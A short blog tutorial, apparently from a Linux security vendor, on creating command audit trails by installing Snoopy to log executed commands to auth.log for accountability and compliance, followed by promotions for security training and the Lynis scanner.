Creating audit trails – Logging commands on Linux with Snoopy

Creating audit trails

Logging commands on Linux with Snoopy

Our customers often want to set-up an audit trail for accounting purposes. When something happens, they want to be able to see what happened, when it did and by whom. Defining an audit trail is also becoming mandatory for compliance, like PCI. One possible solution we cover is using Snoopy, a small library to log executed commands.

How it works

Snoopy is a wrapper around the execve() function. This is a Linux kernel call which instructs it to execute a command pointed to by a filename. This filename is then logged to syslog, together with any parameters. The related syslog level is authpriv. Usually these events on this level will show up in the file /var/log/auth.log.

Installing Snoopy

Debian / Ubuntu

apt-get install snoopy

During installation it will ask your permission to add the wrapper to /etc/, so it can be executed and act as a middle-man.

Snoop library loaded in /etc/

Snoop library loaded in /etc/

If the library is listed, new commands should be “intercepted” and logged to your auth.log.

tail /var/log/auth.log

The output will look similar to:

Output of cat /var/log/auth.log

Display of the /var/log/auth.log file containing events captured by Snoopy.

The installation of Snoopy is easy and quick. No further configuration is needed at this point, although you might want to consider to configure remote syslog. This way the log (and audit trail) is stored on an external location

One more thing...

Keep learning

So you are interested in Linux security? Join the Linux Security Expert training program, a practical and lab-based training ground. For those who want to become (or stay) a Linux security expert.

See training package

Lynis Enterprise screenshot to help with system hardeningSecurity scanning with Lynis and Lynis Enterprise

Run automated security scans and increase your defenses. Lynis is an open source security tool to perform in-depth audits. It helps with system hardening, vulnerability discovery, and compliance.


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.